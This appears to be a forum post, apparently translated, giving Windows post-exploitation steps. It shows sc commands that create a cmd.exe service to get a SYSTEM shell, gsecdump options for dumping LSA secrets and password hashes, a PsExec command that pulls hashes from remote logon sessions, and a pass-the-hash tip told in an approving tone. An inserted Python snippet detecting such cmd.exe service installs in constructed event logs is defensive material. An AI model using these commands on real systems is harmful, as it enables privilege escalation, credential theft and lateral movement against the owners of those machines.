To get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

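Added here as a defender-side example, not part of the original post or the quoted blog: a small Python check that flags service-install records whose image path is cmd.exe (like the shellcmdline service created above) and notes the 1053 start failure that follows it. The log records are constructed, simplified versions of the System log's 7045 (service installed) and 7000 (service start failed) events.

```python
"""Flag service installs that point at cmd.exe and pair them with the
'did not respond in a timely fashion' (1053) failure that a cmd.exe
service always produces, since cmd.exe never talks to the SCM.

The records below are constructed samples; the field names are a
simplified rendering of System-log events 7045 and 7000.
"""
import re

# Match cmd.exe as the image, whether or not arguments follow it.
SHELL_IMAGE = re.compile(r"(^|\\)cmd\.exe\b", re.IGNORECASE)

# Constructed sample log: the shellcmdline install, its start failure,
# and one benign service install for contrast.
SAMPLE_LOG = [
    {"id": 7045, "name": "shellcmdline",
     "image": r"C:\WINDOWS\system32\cmd.exe /K start",
     "type": "user mode service", "account": "LocalSystem"},
    {"id": 7000, "name": "shellcmdline",
     "error": "The service did not respond to the start or control "
              "request in a timely fashion."},
    {"id": 7045, "name": "Spooler",
     "image": r"C:\WINDOWS\system32\spoolsv.exe",
     "type": "user mode service", "account": "LocalSystem"},
]


def find_shell_services(events):
    """Return {service_name: details} for installs whose image is cmd.exe.

    details['start_failed'] becomes True when a later 7000 event for the
    same service carries the 1053 'did not respond' text, which is the
    tell-tale pattern of the sc create/start trick shown in the post.
    """
    suspicious = {}
    for ev in events:
        if ev["id"] == 7045 and SHELL_IMAGE.search(ev["image"]):
            suspicious[ev["name"]] = {
                "image": ev["image"],
                "account": ev["account"],
                "start_failed": False,
            }
        elif (ev["id"] == 7000 and ev["name"] in suspicious
              and "did not respond" in ev.get("error", "")):
            suspicious[ev["name"]]["start_failed"] = True
    return suspicious


if __name__ == "__main__":
    for name, info in find_shell_services(SAMPLE_LOG).items():
        print(f"ALERT service={name} account={info['account']} "
              f"image={info['image']!r} start_failed={info['start_failed']}")
```

Only the install whose image is cmd.exe is reported; a 7045 with a cmd.exe image followed by a 1053 failure for the same service name is the sequence the procedure above leaves in the System log.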
C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - [url]www.sysinternals.com[/url]

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials, because these hashes are LM hashes that can be easily broken with Rainbow Tables.

A tip: you can use iam from the pshtools toolkit to inject the HASH information just grabbed with gsecdump into the local lsass process, carrying out a hash injection attack. The foreigners really are good at this; admins are going to be busy now. The LM/NT hashes obtained during ARP spoofing, and the ones obtained with gethash, never actually need the password cracked at all; it is just a matter of using the tools. As the original puts it, no matter whether the password is 4 characters or 127, once you have the hash it is 100% done.

Original source: [url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]

I looked at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.